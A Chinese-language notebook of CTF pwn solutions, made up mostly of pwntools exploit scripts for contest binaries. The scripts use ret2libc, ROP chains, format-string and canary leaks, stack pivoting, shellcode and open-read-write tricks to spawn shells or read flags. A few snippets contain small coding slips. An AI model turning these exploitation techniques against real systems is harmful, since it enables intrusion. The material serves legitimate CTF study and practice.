PWN刷题笔记（长期更新）

GHCTF

Hello_World

绕PIE

from pwn import *
context.log_level='debug'
p = process('./attachment')
offset=40
backdoor = b"\xC5"
payload = b"A" * offset + backdoor
p.send(payload)
p.interactive()

ret2libc1

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"] 

p=process("./attachment")
elf=ELF('./attachment')
libc=ELF('./libc.so.6')

def manu(choice):
    p.sendlineafter('money\n',str(choice))

def flowers(kind,num):
    manu(1)
    p.sendlineafter('20\n',str(kind))
    '''
    1.peony $10
    2.rose $100
    3.fragrans $20
    '''
    p.sendlineafter('buy?\n',str(num))


def hell_money(count):
        p.sendline(b'3')
        p.sendline(str(count).encode('utf-8'))


def see_it(count):
        p.sendline(b'7')
        p.sendline(str(count).encode('utf-8'))


hell_money(100)
pause()
see_it(10000)
pause()
p.sendline(b'5')
#0x0000000000400579 : ret
ret=0x0000000000400579
pop_rdi = 0x0000000000400d73
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = 0x0000000000400B1E
payload = b'A'*0x48  +p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)

pause()
p.sendline(payload)
pause()
p.recvuntil(b'it!!!\n')
puts_addr = p.recvline()[:6]
puts_addr = u64(puts_addr.ljust(8,b'\x00'))
libc_base = puts_addr - libc.symbols['puts']
success('libc_base-->'+hex(libc_base))
system = libc_base + libc.symbols['system']

binsh = libc_base + next(libc.search(b'/bin/sh'))
success('system-->'+hex(system))

payload = b'A'*0x48  +p64(ret) + p64(pop_rdi) + p64(binsh) + p64(system)
p.sendline(payload)
pause()
p.interactive()

ret2libc2

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"] 

p=process("./ret2libc2")
elf=ELF('./ret2libc2')
libc=ELF('./libc.so.6')
offset = 0x30

rbp_ret = 0x40117d
ret = 0x40101a
bss = 0x4044e8
printf=0x401227

payload1=b'A'*(offset-5) + b'%27$p' + p64(bss+0x400)+p64(printf)

p.sendlineafter('magic\n',payload1)
p.recvuntil(b'A'*(offset-5))
address=p.recvuntil(b'\xe8',drop=True)
address=int(address,16)
success(hex(address))

libc_addr = address - libc.symbols['__libc_start_main']-128
success(hex(libc_addr))

rdi=0x2a3e5+libc_addr
binsh=libc_addr + next(libc.search(b'/bin/sh'))
rsi=0x2be51+libc_addr
system=libc.symbols['system']+libc_addr


payload = b'a'*0x30+ p64(bss+0x500) 
payload+= p64(rdi)+ p64(binsh)+ p64(system)
p.sendafter('magic',payload)
p.interactive()

'''
0xebc81 execve("/bin/sh", r10, [rbp-0x70])
constraints:
  address rbp-0x78 is writable
  [r10] == NULL || r10 == NULL || r10 is a valid argv
  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp

0xebc85 execve("/bin/sh", r10, rdx)
constraints:
  address rbp-0x78 is writable
  [r10] == NULL || r10 == NULL || r10 is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp

0xebc88 execve("/bin/sh", rsi, rdx)
constraints:
  address rbp-0x78 is writable
  [rsi] == NULL || rsi == NULL || rsi is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp

0xebce2 execve("/bin/sh", rbp-0x50, r12)
constraints:
  address rbp-0x48 is writable
  r13 == NULL || {"/bin/sh", r13, NULL} is a valid argv
  [r12] == NULL || r12 == NULL || r12 is a valid envp

0xebd38 execve("/bin/sh", rbp-0x50, [rbp-0x70])
constraints:
  address rbp-0x48 is writable
  r12 == NULL || {"/bin/sh", r12, NULL} is a valid argv
  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp

0xebd3f execve("/bin/sh", rbp-0x50, [rbp-0x70])
constraints:
  address rbp-0x48 is writable
  rax == NULL || {rax, r12, NULL} is a valid argv
  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp

0xebd43 execve("/bin/sh", rbp-0x50, [rbp-0x70])
constraints:
  address rbp-0x50 is writable
  rax == NULL || {rax, [rbp-0x48], NULL} is a valid argv
  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp
'''

hopper

from pwn import *  
p = process('./Hopper')  
  
pop_rsi = 0x401017  
syscall = 0x40100A  
xchg = 0x40100C  
pop_r15=0x40101C  
  
gdb.attach(p)  
pause()  
p.recvuntil(b'    (" ~----( ~   Y.  )\n')  
a = p.recvline()[:6]  
a = int.from_bytes(a,'little')  
print("--->",hex(a))  
payload = p64(pop_r15)+p64(pop_rsi)+p64(0)  
payload += p64(a+0x28) + p64(0)  
payload += p64(59) + p64(syscall)  
payload += p64(0x401021)+ b'/bin/sh\x00'  
p.sendline(payload)  
p.interactive()

NPC2CTF

WEEK1

ORW（Day1 25/2/23）

格式化字符串漏洞的两种利用姿势+orw沙盒利用_格式化字符串泄露canary-CSDN博客

0x000000000002be51 : pop rsi ; ret
0x0000000000035dd1 : pop rbx ; ret
0x000000000002be51 : pop rsi ; ret
0x0000000000045eb0 : pop rax ; ret
0x000000000002a3e5 : pop rdi ; ret
0x00000000000904a9 : pop rdx ; pop rbx ; ret

ROPgadget --binary libc.so.6 --only "pop|ret" |grep "rax"

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]  

elf=ELF('./orw')
libc=ELF('./libc.so.6')
context(log_level='debug',arch='amd64')

# p=process('./orw')
p=remote('175.27.249.18',31548)
p.recvuntil('0x')
libc.address=int(p.recv(12),16)-libc.sym['printf']
log.success('libc = '+hex(libc.address))

rsi=0x000000000002be51+libc.address
rdi=0x000000000002a3e5+libc.address
rdx_rbx=0x00000000000904a9+libc.address
'''
0x000000000002be51 : pop rsi ; ret
0x0000000000035dd1 : pop rbx ; ret
0x0000000000045eb0 : pop rax ; ret
0x00000000000904a9 : pop rdx ; pop rbx ; ret
0x000000000002a3e5
'''
read=libc.sym['read']
puts=libc.sym['puts']
syscall=libc.sym['syscall']
bss=0x403400

payload=b'A'*88
#调用read(0, bss_addr, 4)读入"flag"
payload+=p64(rdi)+p64(0)+p64(rsi)+p64(bss)+p64(rdx_rbx)+p64(8)+p64(0)+p64(read)
#调用syscall(2,bss,0)
payload+=p64(rdi)+p64(2)+p64(rsi)+p64(bss)+p64(rdx_rbx)+p64(0)+p64(0)+p64(syscall)
#read(3(文件), bss, 0x100)
payload+=p64(rdi)+p64(3)+p64(rsi)+p64(bss)+p64(rdx_rbx)+p64(0x100)+p64(0)+p64(read)
#puts(bss)
payload+=p64(rdi)+p64(bss)+p64(puts)

p.sendline(payload)
p.sendline(b'/flag\x00')
p.interactive()

simple_shellcode（Day0 25/2/22）

非预期

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
sh = remote('175.27.249.18', 30369)
shellcode = asm(shellcraft.sh()) #生成并汇编shellcode

sh.sendafter('plz: ', shellcode)
sh.interactive()

预期

#!/usr/bin/env python3
from pwncli import *

context.terminal = ["tmux", "splitw", "-h", "-l", "122"]
local_flag = sys.argv[1] if len(sys.argv) == 2 else 0

if local_flag == "remote":
    addr = '175.27.249.18 30924'
    host = addr.split(' ')
    gift.io = remote(host[0], host[1])
    gift.remote = True
else:
    gift.io = process('./pwn1')
    if local_flag == "nodbg":
        gift.remote = True
init_x64_context(gift.io, gift)
libc = load_libc('/lib/x86_64-linux-gnu/libc.so.6')
elf = gift.elf = ELF('./pwn1')
cmd = '''
'''

launch_gdb(cmd)

ru(b'Shellcode plz: ')

shellcode = '''
pop rax
pop rax
add qword ptr [rsp], 0x30
mov rsp, qword ptr [rsp]
mov rdi, 1
mov rsi, 0x424030
mov rdx, 0x8
mov qword ptr [rbp + 0x8], 0x4011FA
ret
'''

leave_ret = 0x4012CB
payload = p64(elf.plt.write) + p64(leave_ret)

s(asm(shellcode).ljust(0x30, b'\x90') + payload)

libc_base = u64_ex(r(8)) - 0x11EA10
set_current_libc_base_and_log(libc_base)

shellcode = f'''
mov rdi, {next(libc.search(b"/bin/sh")):#x}
mov rsi, {libc.sym.system:#x}
add rsp, 0x8
jmp rsi
'''
s(asm(shellcode))

ia()

EZ_Stack（Day1 25/2/23）

开了NX

//也许有用的gadget
0x000000000040117d : pop rbp ; ret
0x0000000000401203 : pop rdi ; ret
0x000000000040101a : ret
0x000000000040103a : jmp 0x401020
0x0000000000401194 : jmp 0x401120
0x000000000040100b : jmp 0x4840103f
0x0000000000401217 : jmp 0x48401229
0x000000000040110c : jmp rax
0x000000000040101a : ret

0x000000000040127f : leave ; ret

基本思路

格式化字符串泄露libc+栈迁移

泄露libc

printf处下断点
b* 0x401254


6

泄露rbp

p.recvuntil("What's your name?") 
payload=b'AAAA'+b'%22$p' 
p.send(payload)

p.recvuntil("Nice to meet you \n") 
p.recvuntil("AAAA") 
rbp = int(p.recvuntil(" "), 16) 
print(hex(rbp)) 
pause() 
buf=rbp-0x30-0x80 
pop_rdi=0x0401203 
lea_ret=0x040127f 
ret=0x040101a

puts_plt=elf.plt['puts'] 
puts_got=elf.got['puts']

payload=p64(pop_rdi) 
payload+=p64(puts_got) 
payload+=p64(puts_plt) 
payload+=p64(0x0401208) 
payload.ljust(0x80,b'\x00') 
payload+=p64(buf) 
payload+=p64(lea_ret)

p.recvuntil("Do you know stack pivating?") p.send(payload)

22=6+128//8

0xb0=0xb00-0xa50

本地exp

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]
elf=ELF('./ezstack')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
puts_got=elf.got['puts']
printf_got=elf.got['printf']
read_got=elf.got['read']

p=process('./ezstack')
#p=remote('175.27.249.18',30150)

#泄露libc
# payload1=b'AAA%8$s%9$s%10$s'+p64(puts_got)+p64(printf_got)+p64(read_got)
# p.sendafter("What's your name?\n",payload1)
# p.recvuntil("Nice to meet you \n")

# data=p.recv(27)
# puts_addr=u64(data[3:9].ljust(8,b'\x00'))
# printf_addr=u64(data[9:15].ljust(8,b'\x00'))
# read_addr=u64(data[15:21].ljust(8,b'\x00'))

# success("puts_addr: "+hex(puts_addr))
# success("printf_addr: "+hex(printf_addr))
# success("read_addr: "+hex(read_addr))
 
#泄露rbp
p.recvuntil("What's your name?")
payload=b'AAA%22$p'

p.send(payload)
p.recvuntil("Nice to meet you \n")

rbp = int(p.recv(17)[3:],16)
success(hex(rbp))

base=0x00007ffff7c00000
  
bin_sh=libc.search(b'/bin/sh').__next__()
bin_addr=base+bin_sh
pop_rdi=0x401203
leave_ret=0x40127
system_addr=base+libc.sym['system']
fake_rbp=rbp-0xb0-8
payload2= p64(pop_rdi)+p64(bin_addr)+p64(system_addr)+b'A'*(128-24)+p64(fake_rbp)+p64(leave_ret)

p.sendafter("Do you know stack pivating?\n",payload2)
p.interactive()

远程exp

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]
elf=ELF('./ezstack')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
puts_got=elf.got['puts']
printf_got=elf.got['printf']
read_got=elf.got['read']

# p=process('./ezstack')
p=remote('175.27.249.18',30999)

# 泄露libc
# payload1=b'AAA%8$s%9$s%10$s'+p64(puts_got)+p64(printf_got)+p64(read_got)
## fmt对应第7个，puts_got对应第8个
# p.sendafter("What's your name?\n",payload1)
# p.recvuntil("Nice to meet you \n")

# data=p.recv(27)
# puts_addr=u64(data[3:9].ljust(8,b'\x00'))
# printf_addr=u64(data[9:15].ljust(8,b'\x00'))
# read_addr=u64(data[15:21].ljust(8,b'\x00'))

# success("puts_addr: "+hex(puts_addr))
# success("printf_addr: "+hex(printf_addr))
# success("read_addr: "+hex(read_addr))

#be0

#泄露rbp
p.recvuntil("What's your name?")
payload=b'AAAAAAA%8$s%22$p' + p64(puts_got)

p.send(payload)
p.recvuntil("Nice to meet you \n")

p.recvuntil("AAAAAAA")

puts_addr=u64(p.recv(6).ljust(8,b'\x00'))
success("puts_addr:"+hex(puts_addr))
rbp=int(p.recv(14),16)
success("rbp:"+hex(rbp))

base=puts_addr-0x080e50

bin_addr=base+0x1d8678
pop_rdi=0x401203
leave_ret=0x40127f
system_addr=base+0x050d70 

fake_rbp=rbp-0xb0-8
payload2= p64(pop_rdi)+p64(bin_addr)+p64(system_addr)+b'A'*(128-24)+p64(fake_rbp)+p64(leave_ret)

p.sendafter("Do you know stack pivating?\n",payload2)
p.interactive()

WEEK2

List（Day2 25/2/24）

0x0000000000400acc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400ace : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400ad0 : pop r14 ; pop r15 ; ret
0x0000000000400ad2 : pop r15 ; ret
0x0000000000400acb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400acf : pop rbp ; pop r14 ; pop r15 ; ret
0x00000000004006c0 : pop rbp ; ret
0x0000000000400ad3 : pop rdi ; ret
0x0000000000400ad1 : pop rsi ; pop r15 ; ret
0x0000000000400acd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret

0x00000000004005c9 : ret

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"] 

p=process("./list")
# p=remote("175.27.249.18",31766)   

elf=ELF('./list')
libc=ELF('./libc.so.6')

def choice(index):
    p.sendlineafter("Your option:",str(index))

def change(index,content):
    choice(1)
    p.sendline(str(index))
    p.sendline(str(content))

def exit():
    choice(5)

'''
0x0000000000400ad3 : pop rdi ; ret
0x00000000004005c9 : ret
'''
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
rdi=0x400ad3
ret=0x4005c9
main_addr=0x4007c1
change(19,rdi)
change(20,puts_got)
change(21,puts_plt)
change(22,main_addr)
exit()

p.recvuntil("\n")
puts_addr=u64(p.recv(6).ljust(8,b'\x00'))
success("puts_addr:"+hex(puts_addr))

base_addr=puts_addr-libc.sym['puts']
success("base_addr:"+hex(base_addr))

system_addr=base_addr+libc.sym['system']
binsh_addr=base_addr+next(libc.search(b'/bin/sh'))
success("system_addr:"+hex(system_addr))
success("binsh_addr:"+hex(binsh_addr))

change(19,rdi)
change(20,binsh_addr)
change(21,system_addr)
change(22,main_addr)
exit()
p.interactive()

Normal_shellcode

NISACTF

ezheap

from pwn import *

io=process('./ez_heap')
p = ELF("ez_heap")
payload = cyclic(0x20)
payload += b'/bin/sh\x00'
io.sendline(payload)
io.interactive()

girl_friend

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]   

elf=ELF('girlfriend')
p=process('./girlfriend')

def choice(num):
    p.recvuntil("Your choice :")
    p.sendline(str(num))
def add(name_size,name):
    choice(1)
    p.sendafter("Her name size is :",name_size)
    p.sendafter("Her name is :",name)
def delete(index):
    choice(2)
    p.sendlineafter('Index :',index)
def show(index):
    choice(3)
    p.sendafter("Index :",index)

backdoor_addr=0x400B9C
add("16",p64(backdoor_addr))
add("40",'bbbb')
delete("0")
delete("1")

add("16",p64(backdoor_addr))

show("0")
p.interactive()

鹤城杯

littleof(2021鹤城杯)

from pwn import *

context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]

p=process('./littleof')
elf = ELF('./littleof')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

pl1='a'*0x49
p.sendafter('overflow?\n',pl1)
data=p.recv()
canary=b'\x00'+data[0x49:0x49+7]
canary = int.from_bytes(canary,'little')

success('canary:')
success(hex(canary))

#ret2libc

# 0x000000000040059e : ret
# 0x0000000000400863 : pop rdi ; ret
ret=0x40059e
pop_rdi=0x400863
func=0x4006E2

payload2 = b'a'*0x48 + p64(canary) + b'a'*8 + p64(pop_rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(func)
p.sendline(payload2)

p.recvuntil(b'win')
p.recv(1)
puts_addr = u64(p.recv(6).ljust(8, b'\0'))
success('puts_addr:')
success(hex(puts_addr))

libc.address = puts_addr - libc.symbols['puts']
success('libc.address:')
success(hex(libc.address))

binsh = next(libc.search(b'/bin/sh'))
success('binsh:')
success(hex(binsh))

system = libc.symbols['system']
success('system:')
success(hex(system))

p.sendafter('overflow?\n',pl1)
data=p.recv()
canary=b'\x00'+data[0x49:0x49+7]
canary = int.from_bytes(canary,'little')

success('canary:')
success(hex(canary))
payload2=b'a'*0x48 + p64(canary) + b'a'*8  +p64(ret)+p64(pop_rdi) + p64(binsh) + p64(system)
p.send(payload2)

p.interactive()

Geek Challenge

ez_shellcode

from pwn import *

context.arch = 'amd64'
context.os = 'linux'
context.log_level = 'debug'

p = process('./shellcode')

shellcode = asm(shellcraft.sh())
p.sendline(shellcode)
backdoor = 0x401256
p.sendline(b"A"*(0x18+8) + p64(backdoor))

p.interactive()

买黑吗喽了吗（整数溢出，栈溢出）

from pwn import *

context.arch = 'amd64'
context.os = 'linux'
context.log_level = 'debug'

p = process('./syscall')
elf=ELF('./syscall')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')

for i in range(9):
    p.sendlineafter('choice:',"1")
    p.sendlineafter('choice:',"1")

p.sendlineafter('choice:',"1")
p.sendlineafter('choice:',"2")

p.sendlineafter('choice:',"2")
p.send(b'%p')

p.recvuntil('0x0x')
base=int(p.recv(12),16)-0x4090
success('base:'+hex(base))

rdi=base+0x11f1
rsi=base+0x11f3
rax=base+0x11f7
bss=base+0x4090
rdx=base+0x11f5
syscall=base+0x11EE

rop=p64(rax)+p64(0)+p64(rdi)+p64(0)+p64(rsi)+p64(bss)+p64(rdx)+p64(0x8)+p64(syscall)
rop+=p64(rax)+p64(0x3b)+p64(rdi)+p64(bss)+p64(rsi)+p64(0)+p64(rdx)+p64(0)+p64(syscall)

payload=b"A"*0x58+rop
payload=payload.ljust(0x100,b"\x00")

p.sendlineafter('your choice:',"3")

p.sendafter('feedback',payload)
p.send('/bin/sh\x00')

p.interactive()

su~~~~

from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
p = process('./csu')
elf = ELF('./csu')
libc = ELF('./libc.so.6')

#==================================================================== 
li = lambda x : print('\\x1b[01;38;5;214m' + x + '\\x1b[0m') 
ll = lambda x : print('\\x1b[01;38;5;1m' + x + '\\x1b[0m') 
s = lambda s : p.send(s) 
sl = lambda s : p.sendline(s) 
sa = lambda n,s : p.sendafter(n,s) 
sla = lambda n,s : p.sendlineafter(n,s) 
r = lambda n : p.recv(n) 
rl = lambda : p.recvline() 
ru = lambda s : p.recvuntil(s) 
ra = lambda : p.recvall() 
ia = lambda : p.interactive() 
uu32 = lambda data : u32(data.ljust(4, b'\\x00')) 
uu64 = lambda data : u64(data.ljust(8, b'\\x00')) 
# u64(p.recvuntil(b'\\x7f')[-6:].ljust(8,b'\\x00')) 
# u32(p.recvuntil(b'\\xf7')) 
def g(): 
    gdb.attach(p) 
    pause() 
#=====================================================================


def csu(rbx, rbp, r12, r13, r14, last):
    mov_addr = 0x4008E0
    pop_addr = 0x4008FA
    fakeebp=b'a' * 8
    payload = b'a' * 0x80+fakeebp
    payload += p64(pop_addr) + p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14)
    payload += p64(1)+p64(mov_addr)
    payload += b'a' * 0x38
    payload += p64(last)
    p.send(payload)


sla("exit.\n",b'1')
puts_got = elf.got['puts']  

read_addr=0x400798
csu(0, 1, puts_got, puts_got, 0, read_addr)

puts_base = u64(p.recv(6).ljust(8,b'\0'))
success('puts_base:'+hex(puts_base))
libc.address = puts_base - libc.sym['puts']
success('libc_base:'+hex(libc.address))

ogg=0x4f302+libc.address

payload2=b'a'*0x80+b'a'*8+p64(ogg)
p.send(payload2)
ia()

ez_fmt

from pwn import *

context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
p=process('./fmt')

def dbg():
    gdb.attach(p)


p.sendlineafter('ID:\n','A')
p.sendafter('name?\n','%13$p%14$p')

p.recvuntil('0x')
canary = int(p.recv(16), 16)
success('canary =>> ' + hex(canary))
p.recvuntil('0x')
rbp = int(p.recv(12), 16)
success('rbp =>> ' + hex(rbp))

ret=rbp-0x18
p.send(p64(ret+1)+b'A' * 0x30 + p64(canary) + p64(rbp)+ b'\xEC')

# gdb.attach(p)
# pause()
p.sendafter('name?\n',b'%18c%6$hhn')
p.sendafter('say?\n',b'A' * 0x38 + p64(canary) + p64(rbp)+ b'\x85')

p.interactive()

真的能走到后门吗

 from pwn import *

context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
p=process('./fmt')

def dbg():
    gdb.attach(p)


p.sendlineafter('ID:\n','A')
p.sendafter('name?\n','%13$p%14$p')

p.recvuntil('0x')
canary = int(p.recv(16), 16)
success('canary =>> ' + hex(canary))
p.recvuntil('0x')
rbp = int(p.recv(12), 16)
success('rbp =>> ' + hex(rbp))

ret=rbp-0x18 #动调可知此为返回地址rbp-0x18
p.send(p64(ret+1)+b'A' * 0x30 + p64(canary) + p64(rbp)+ b'\xEC') #ret+1即为最终要修改的倒数第二个字节

# gdb.attach(p)
# pause()
p.sendafter('name?\n',b'%18c%6$hhn')
p.sendafter('say?\n',b'A' * 0x38 + p64(canary) + p64(rbp)+ b'\x85')

p.interactive()

空调

from pwn import *
filename = './pwn'

debug = 0
if debug:
    io = remote('nc1.ctfplus.cn', 18839)
else:
    io = process(filename)

elf = ELF(filename)
context(arch = elf.arch, log_level = 'debug', os = 'linux')
context.terminal = ['tmux', 'splitw', '-h']

def dbg():
    gdb.attach(io)

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

io.sendlineafter('chioce>:', '5')
io.sendline('0x404018')

io.recvuntil('massege:')
libcbase = u64(io.recv(6).ljust(8, b'\0')) - libc.sym['puts']
success('libcbase =>> ' + hex(libcbase))


system = libcbase + libc.sym['system']
printf = libcbase + libc.sym['printf']


def menu(num): 
    io.sendlineafter("<Your chioce>:",str(num).encode())
def delete(id): 
    menu(3) 
    io.sendlineafter("Index: ",str(id).encode())
def edite(id,payload): 
    menu(4) 
    io.sendlineafter("Index: ",str(id).encode()) 
    io.sendafter("message:",payload)

def add(name,introduce):
    menu(1) 
    io.sendlineafter("Your name:",name) 
    io.sendafter("Introduce:",introduce)

edite(-4,p64(0)+p64(printf)+p64(system))  #一个结构体0x30，写intro再+0x10
add(b'/bin/sh',b'a') 
delete(0)
io.interactive()

orz？orw！

from pwn import *
filename = './orw'

debug = 0
if debug:
    io = remote('nc1.ctfplus.cn', 18839)
else:
    io = process(filename)

elf = ELF(filename)
context(arch = elf.arch, log_level = 'debug', os = 'linux')
context.terminal = ['tmux', 'splitw', '-h']

def dbg():
    gdb.attach(io)

io.sendlineafter('size:', '3')
io.sendafter('name:',(b'1').ljust(0x11-7,b'a'))

size = len("Hello 1aaaaaaaa") 
res = io.recvline()
res = io.recvline()

print("res",res) 
canary = u64(res[size:size+8]) 
canary -=0x61
success('canary =>> ' + hex(canary))

io.sendafter('id',b'A' * 4 + p64(canary) + b'A' * 8 + p64(0x4012A7) + asm(shellcraft.open('./flag', 0) + shellcraft.read(3, 0x404500, 0x100) + shellcraft.write(1, 0x404500, 0x100)))

io.interactive()

CISCN

2023 Shaokao

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]
p=process("./shaokao")
elf=ELF('./shaokao')

def choose(choice):
    p.recvuntil(">")
    p.sendline(str(choice))

def buy():
    choose(1)
    p.recvuntil("天涯\n")
    p.sendline(str(1))
    p.recvuntil("？\n")
    p.sendline(str(-10000))

buy()
choose(3)
choose(4)
choose(5)

payload=b'/bin/sh\x00'+b'a'*0x20+p64(0x40264f)+p64(0x4E60F0)+p64(0x40a67e)+p64(0)+p64(0x4a404b)+p64(0)+p64(0)
payload+=p64(0x458827)+p64(59)+p64(0x402404)
p.sendafter("赐名：\n",payload)
p.interactive()


'''
rdi=binsh地址,rsi=0,rdx=0，rax=59，syscall
0x0000000000458827 : pop rax ; ret
0x000000000040264f : pop rdi ; ret
0x000000000040a67e : pop rsi ; ret
0x00000000004a404b : pop rdx ; pop rbx ; ret
0x0000000000402404 : syscall
name=0x4E60F0
'''

青海民族大学

System

from pwn import *

p=process('./system')
elf=ELF('./system')
context.log_level='debug'


#静态编译，IDA查看即可
open_addr = 0x0806D020
read_addr = 0x0806D090
write_addr = 0x0806D100
bss_addr = 0x080EB000
put_addr = 0x0804F7E0  
ret=0x080481b2
pop1ret=0x0804846f
pop3ret=0x0806336b
pop2ret=0x0805c508
sh=0x080BE408
mprotect=0x0806DBB0

#========orw============
# payload = b'A' * 112

# payload += p32(put_addr)
# payload += p32(pop1ret)
# payload += p32(sh)

# payload += p32(read_addr)
# payload += p32(pop3ret)
# payload += p32(0)
# payload += p32(bss_addr)
# payload += p32(8)

# # open(bss_addr, 0)
# payload += p32(open_addr)
# payload += p32(pop2ret)
# payload += p32(bss_addr)
# payload += p32(0)      

# # read(fd, bss_addr, 100)
# payload += p32(read_addr)
# payload += p32(pop3ret)
# payload += p32(3)
# payload += p32(bss_addr)
# payload += p32(100)

# # write(1, bss_addr, 100)
# payload += p32(write_addr)
# payload += p32(ret)
# payload += p32(1) 
# payload += p32(bss_addr)
# payload += p32(100)

# p.sendline(payload)
# p.sendlineafter(b'/bin/sh',b'/flag\x00')
# p.interactive()
#=======================

#========mprotect=======
payload = b'A' * 112
payload += p32(mprotect)
payload += p32(pop3ret)
payload += p32(bss_addr)
payload += p32(0x1000)
payload += p32(7)

payload += p32(put_addr)
payload += p32(pop1ret)
payload += p32(sh)

payload += p32(read_addr)
payload += p32(bss_addr)
payload += p32(0)
payload += p32(bss_addr)
payload += p32(len(asm(shellcraft.sh())))


p.sendline(payload)
payload2=asm(shellcraft.sh())
p.sendafter(b'/bin/sh\n',payload2)
p.interactive()
#=======================